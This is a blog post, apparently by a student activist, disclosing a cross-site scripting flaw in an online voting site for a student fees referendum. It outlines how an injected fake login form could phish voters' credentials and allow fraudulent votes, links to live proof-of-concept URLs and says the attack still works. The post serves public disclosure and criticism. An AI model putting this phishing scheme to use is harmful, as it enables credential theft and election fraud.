Click to view the full size image
Update: The developer appears to have fixed this issue. He fixed it on the subdomain, but forgot about the root (why am I not surprised). I can still perform xss attacks on http://usivote.com
Very simple proof of concept, check the email address form at – http://t.co/jP0cyXMv
Pro tip:if you’re a company called Starlight, don’t use starlight as your password
I’ll be posting updates on Twitter – https://twitter.com/#!/ThirdLevelFees
********** Orignial Post begins************
A chairde,
You may remember me from videos such as “USI Fees Preferendum: is it secure?”
Unfortunately, security concerns about the vulnerability of USIs voting system were dismissed by the developer and the USI President, in an attempt at damage limitation.
I would like to draw your attention to another security issue (one of several).
Please view this url in Firefox or Chrome – http://bit.ly/usivote (this has now been partially fixed).
What did that url show?
That url did contained FAKE login form (pictured at the beginning of this post), which I added to the USIvote website via a method known as cross site scripting (xss).
Click to view the full size image
Why is this an issue, isn’t Edugate secure?
This can be used as a basic form of phishing:
I take the url with the xss, and shorten it with bit.ly to http://bit.ly/usivote
I then flood social media outlets, like Twitter and Facebook, with that link, encouraging people to vote.
If a victim attempts to enter their login details on the FAKE form, those details get sent to me via the destination.asp in the url.
I can then take the victims login details, use them to log in to Edugate, and cast a vote
This would allow me to cast multiple fraudulent votes, without having any issues with Edugates security.
The fact that the form is located at a url on the USI site itself, makes it look legitimate in the eyes of the victim.
Please note: This has nothing to do with Edugate, or the HEAs security – Edugate can only verify the data given to it, it can’t verify the person typing in the info.
Poor coding from the sites developers allows me to inject my own code into the USIvote website, at will – including html, iframes and javascript.
I can’t stress how poorly USIvote.com has been set up. Multiple security issues like this exist in the parts of the voting system which USI are responsible for.
More info on these & other security holes, and how they can be used to manipulate the result of the Preferendum result, will be posted on https://usifeesreferendum.wordpress.com/ tomorrow afternoon.
Regards,
LM
CFAC FTW
*Some versions of IE may contain warnings about xss if you try to view the link. It’s also possible that some anti-virus software, browser extensions, or heightened security defaults from workplace or college pcs may prevent the xss from occurring in your browser
Got an opinion? Leave a comment below.
9D the Vote at USI Special Congress
Click the image to view it in full size
The video below documents an earlier security issue. If it’s blurry, view it in fullscreen at 720p.
USI Fees Referendum 